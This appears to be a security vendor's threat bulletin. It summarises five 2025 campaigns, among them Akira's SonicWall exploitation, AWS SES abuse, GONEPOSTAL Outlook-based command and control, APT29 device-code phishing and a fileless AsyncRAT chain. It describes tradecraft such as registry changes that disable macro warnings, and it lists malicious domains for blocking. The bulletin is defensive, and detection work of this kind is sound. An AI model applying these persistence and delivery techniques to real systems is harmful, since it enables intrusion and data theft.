F5 Threat Report - September 17th, 2025

Akira Ransomware Exploiting Critical SonicWall SSLVPN Bug Again

The Akira ransomware group is actively exploiting CVE-2024-40766, a critical-severity access control vulnerability in SonicWall SSL VPN devices, to gain unauthorized access to target networks. This flaw, which allows unauthorized resource access and can cause firewall crashes, was patched by SonicWall in August of the previous year, with a strong recommendation for users to reset passwords for locally managed SSLVPN accounts after applying the update to prevent threat actors from leveraging exposed credentials. Despite the patch, Akira began actively exploiting the vulnerability in September 2024, with recent alerts from the Australian Cyber Security Centre and observations from Rapid7 indicating a resurgence in attacks, likely due to incomplete remediation. SonicWall has confirmed that the current activity is linked to CVE-2024-40766, not a new zero-day, and has investigated up to 40 related security incidents. The vulnerability impacts SonicWall firewall versions including Gen 5 (5.9.2.14-12o and older), Gen 6 (6.5.4.14-109n and older), and Gen 7 (7.0.1-5035 and older), necessitating updates to firmware version 7.3.0 or later, rotation of SonicWall account passwords, enforcement of multi-factor authentication, mitigation of SSLVPN Default Groups risk, and restriction of Virtual Office Portal access to trusted networks.

Severity:High

Source

• https://www.bleepingcomputer.com/news/security/akira-ransomware-exploiting-critical-sonicwall-sslvpn-bug-again/

Threat Details and IOCs

Mitigation Advice

• Immediately patch all vulnerable SonicWall devices (Gen 5, 6, and 7) to the latest recommended firmware version to remediate CVE-2024-40766.
• Force an immediate password rotation for all locally managed user accounts on SonicWall SSLVPN devices.
• Configure firewall access control lists to restrict access to the SonicWall SSLVPN and Virtual Office Portal interfaces to only trusted IP address ranges.

Compliance Best Practices

• Develop and execute a plan to enforce mandatory multi-factor authentication (MFA) for all users accessing the SonicWall SSLVPN.
• Perform a configuration audit of SonicWall devices to identify and remediate overly permissive settings, specifically focusing on mitigating risks associated with the 'SSLVPN Default Groups'.
• Review and enhance the existing vulnerability management program to ensure timely patching of all internet-facing infrastructure and include a verification step to confirm all required mitigations, such as password resets or configuration changes, are completed.

---

From Compromised Keys to Phishing Campaigns: Inside a Cloud Email Service Takeover

A cloud email service takeover campaign in May 2025 leveraged compromised AWS access keys to bypass Amazon Simple Email Service (SES) restrictions and launch large-scale phishing operations. Attackers, after obtaining an access key with SES permissions, performed reconnaissance using GetCallerIdentity, GetSendQuota, and GetAccount API calls. They then rapidly issued multi-regional PutAccountDetails requests to transition the SES account from sandbox to production mode, providing a generic justification that was approved by AWS support. Although attempts to programmatically increase email quotas via CreateCase API and escalate IAM privileges failed, the default 50,000-emails-per-day production quota was sufficient. Subsequently, the attackers verified multiple domains, including attacker-owned and legitimate domains with weak DMARC, and created email identities (e.g., admin@, billing@). This infrastructure was used for a phishing campaign targeting various organizations with fake 2024 tax forms, linking to a credential theft site hidden behind a commercial redirect service. Such SES abuse poses significant reputational, compromise, and operational risks, indicating broader credential compromise. To mitigate this, organizations should restrict SES where unused, regularly audit and rotate access keys, enforce least privilege for SES permissions, and diligently log and alert on SES API calls, especially PutAccountDetails, and monitor for sudden spikes in service usage or unusual sender additions.

Severity:High

Source

• https://www.wiz.io/blog/wiz-discovers-cloud-email-abuse-campaign

Threat Details and IOCs

Mitigation Advice

• Block the following domains at the web proxy, DNS filter, and email gateway: managed7.com, street7news.org, street7market.net, docfilessa.com, and irss.securesusa.com.
• Conduct an immediate audit of all IAM user access keys, focusing on identifying and disabling keys that have been inactive for over 90 days and have suddenly shown activity, or keys used from geographically anomalous locations.
• Create a CloudTrail alert to trigger on multiple `ses:PutAccountDetails` API calls originating from the same IAM principal across different AWS regions within a short time window, such as 5 minutes.
• Configure a CloudTrail alert to trigger on any non-console invocation of the `support:CreateCase` API, especially when related to service quota increases.
• Immediately review your AWS SES configuration in all regions to verify that no unauthorized domains or email addresses have been added as sending identities and that the account has not been unexpectedly moved from the sandbox to "production" mode.

Compliance Best Practices

• Implement and enforce a mandatory 90-day rotation policy for all IAM user access keys and establish a process to automatically disable keys that have not been used for more than 90 days.
• Initiate a project to review and refactor all IAM policies to adhere to the principle of least privilege, specifically restricting permissions for sensitive SES actions like `ses:PutAccountDetails` and `ses:CreateEmailIdentity` to a minimal number of dedicated administrative roles.
• Use AWS Organizations and Service Control Policies (SCPs) to explicitly deny access to the Amazon SES service in all AWS accounts that do not have a legitimate business requirement to send bulk email.
• Develop and execute a phased plan to implement DMARC for all company-owned domains, starting with a `p=none` policy for monitoring and progressively moving to `p=quarantine` and `p=reject` to prevent unauthorized email spoofing.
• Enable AWS CloudTrail logging for all regions in all accounts, forwarding logs to a central security information and event management (SIEM) system. Specifically, enable SES data events within CloudTrail for granular visibility into email sending activity.
• Configure AWS CloudWatch anomaly detection on key service metrics, such as SES `SendEmail` volume and S3 `PutObject` counts, to automatically detect and alert on significant deviations from established baselines.

---

GONEPOSTAL Malware Exploits Outlook for Stealthy Command-and-Control

A sophisticated espionage campaign employs GONEPOSTAL, a novel malware attributed to the Russian state-sponsored group KTA007, also known as Fancy Bear or APT28, which transforms Microsoft Outlook into a stealthy command and control channel. Discovered by Kroll, GONEPOSTAL operates via a two-stage attack: a malicious DLL disguised as `SSPICLI.dll` initiates a PowerShell sequence that copies a `testtemp.ini` file to `VbaProject.OTM` in the Outlook profile directory, while also performing victim identification via DNS lookups and HTTP requests to services like webhook.site. Persistence is achieved through critical registry modifications to `Software\Microsoft\Office\16.0\Outlook`, specifically setting `LoadMacroProviderOnBoot` to enable automatic macro loading, `Level` to allow unrestricted macro execution, and `PONT_STRING` to suppress security warnings, all facilitating the core functionality housed within the obfuscated, password-protected `VbaProject.OTM` VBA macros. Upon Outlook startup, the malware initializes and monitors incoming emails for specific command signatures, supporting `cmd` for command execution with output, `cmdNo` for silent execution, `upload` for writing files, and `download` for reading and exfiltrating files, processing base64-encoded payloads and exfiltrating data by base64 encoding and chunking files into approximately 3.15-megabyte segments for email attachments, before cleaning up forensic evidence by removing processed emails.

Severity:Critical

Source

• https://gbhackers.com/gonepostal-malware/

Threat Details and IOCs

Mitigation Advice

• Use your endpoint detection and response (EDR) tool to scan all endpoints for the file 'VbaProject.OTM' within the '%APPDATA%\Microsoft\Outlook\' directory.
• Audit the Windows Registry on all endpoints for unauthorized changes to the 'LoadMacroProviderOn', 'Level', and 'PONT_STRING' values under the 'HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security' key.
• Add 'webhook.site' and 'oast.fun' to your DNS blocklist and web proxy filter to disrupt the malware's victim identification callback.
• Use your EDR or system management tools to identify any instances of 'SSPICLI.dll' that are not digitally signed by Microsoft or are located outside of the expected System32 directory.
• Search available PowerShell logs for command-line activity involving the copying of files to the Outlook profile directory, specifically looking for the creation of 'VbaProject.OTM'.

Compliance Best Practices

• Implement a Group Policy (GPO) to set the Microsoft Office macro security level to 'High' or 'Vey High', which disables all macros except those that are digitally signed by a trusted publisher.
• Enable PowerShell Script Block Logging and Module Logging across all endpoints and forward these logs to a centralized SIEM for monitoring and alerting on suspicious script execution.
• Configure your Endpoint Detection and Response (EDR) solution to generate alerts when Microsoft Office applications, such as Outlook.exe, spawn child processes like PowerShell.exe or Cmd.exe.
• Deploy an application control technology, such as Windows Defender Application Control (WDAC) or AppLocker, to enforce a policy that only allows authorized and signed DLLs and scripts to execute.
• Enable registry auditing on endpoints for critical Microsoft Office security keys and forward these events to a SIEM to create alerts for unauthorized modifications.

---

Amazon Disrupts Russian APT29 Hackers Targeting Microsoft 365

Researchers disrupted an operation by the Russian state-sponsored threat group Midnight Blizzard, also known as APT29, which sought to access Microsoft 365 accounts and data. This group employed a watering hole campaign, compromising legitimate websites to redirect a small percentage of visitors to malicious infrastructure mimicking Cloudflare verification pages, such as findcloudflare[.]com or cloudflare[.]redirectpartners[.]com. The objective was to trick users into authorizing attacker-controlled devices through Microsoft's device code authentication flow, thereby gaining access to credentials and intelligence. Amazon's threat intelligence team identified the campaign, isolated the threat actor's EC2 instances, and collaborated with Cloudflare and Microsoft to disrupt the identified domains, continuing to track and disrupt the group's attempts to shift infrastructure. This campaign reflects an evolution in APT29's technical approach, moving away from AWS impersonation or social engineering for MFA bypass. Users are advised to verify device authorization requests, enable multi-factor authentication, and avoid executing commands copied from webpages, while administrators should consider disabling unnecessary device authorization flows, enforcing conditional access policies, and closely monitoring for suspicious authentication events.

Severity:Critical

Source

• https://www.bleepingcomputer.com/news/security/amazon-disrupts-russian-apt29-hackers-targeting-microsoft-365/

Threat Details and IOCs

Mitigation Advice

• Add the domains 'findcloudflare[.]com' and 'cloudflare[.]redirectpartners[.]com' to your web filter, DNS sinkhole, and firewall blocklists.
• In Microsoft Entra ID, create a Conditional Access policy to block the 'Device code flow' authentication flow for all users, unless there is a specific business requirement for it.
• Review Microsoft Entra ID sign-in logs for all authentication events that used the 'Device code' flow. Investigate any successful authentications from unfamiliar locations or devices.
• Send a security advisory to all employees warning them to be suspicious of any unexpected prompts to authorize a new device sign-in for their Microsoft 365 account, especially if it originates from a web browser.

Compliance Best Practices

• Initiate a project to review and strengthen all Microsoft Entra ID Conditional Access policies to enforce location-based, device-based, and risk-based access controls for all cloud applications.
• Implement and enforce phishing-resistant Multi-Factor Authentication (MFA), such as FIDO2 security keys or certificate-based authentication, for all users, prioritizing privileged accounts.
• Implement a continuous security awareness training program that includes phishing simulations specifically designed to mimic modern threats like consent phishing and device authorization abuse.
• Integrate Microsoft Entra ID sign-in and audit logs into your SIEM to develop specific detection rules and alerts for anomalous authentication patterns, such as an unusual volume of device code authentications or sign-ins from non-compliant devices.

---

Fileless Malware Deploys Advanced RAT via Legitimate Tools

A sophisticated fileless malware campaign has been identified, leveraging legitimate system tools to deploy AsyncRAT, a powerful remote access Trojan. The attack initiates through a compromised ScreenConnect client, establishing an interactive session via `relay.shipperzone[.]online`. A VBScript, `Update.vbs`, then executes a PowerShell command to download two payloads, `logs.ldk` and `logs.ldr`, to `C:\Users\Public\`. These payloads are loaded directly into memory using reflection, bypassing disk-based detection. The infection chain proceeds with a first-stage .NET assembly, `Obfuscator.dll`, which includes classes to initialize the runtime, establish persistence via a "Skype Updater" scheduled task, and disable Windows security logging. The final payload, `AsyncClient.exe`, functions as the command-and-control engine, communicating with domains like `3osch20[.]duckdns[.]org` using TCP-based protocols. This AsyncRAT variant performs system reconnaissance, executes commands, and exfiltrates sensitive data, including operating system details, privilege levels, antivirus status, active window titles, browser extensions like MetaMask and Phantom, and conducts keylogging with context capture.

Severity:Critical

Source

• https://thehackernews.com/2025/09/asyncrat-exploits-connectwise.html

Threat Details and IOCs

Mitigation Advice

• Block the domains `relay.shipperzone[.]online` and `3osch20[.]duckdns[.]org` at the network perimeter firewall and in the corporate DNS filtering solution.
• Use your Endpoint Detection and Response (EDR) or system management tools to scan all endpoints for the existence of `logs.ldk` and `logs.ldr` in the `C:\Users\Public\` directory.
• Scan all Windows systems for a scheduled task named 'Skype Updater' and investigate any machines where this task is found.
• Immediately audit all on-premise and cloud ScreenConnect instances to ensure they are patched to the latest version, review user accounts for unauthorized additions, and enforce multi-factor authentication for all remote access.
• In your SIEM or EDR, hunt for instances of `WScript.exe` executing `PowerShell.exe` to download files, which matches the technique described in the article.

Compliance Best Practices

• Enable PowerShell Script Block Logging and Module Logging via Group Policy and forward these logs to your SIEM to create detections for obfuscated scripts and suspicious in-memory execution.
• Deploy an application control policy, such as Windows Defender Application Control (WDAC) or AppLocker, to restrict the execution of unauthorized scripts and binaries from non-standard locations like `C:\Users\Public\`.
• Establish a formal policy and technical standard for all remote access software, requiring tools to be centrally managed, configured with multi-factor authentication, and have their session logs forwarded to the SIEM for monitoring.
• Work with your EDR vendor or internal team to create and enable behavioral detection rules that alert on processes attempting to disable security logging or perform in-memory .NET assembly loading from a scripting engine.
• For user groups that do not have a business need for scripting, use Group Policy to disable Windows Script Host (`WScript.exe`) and set the PowerShell execution policy to 'Restricted'.

---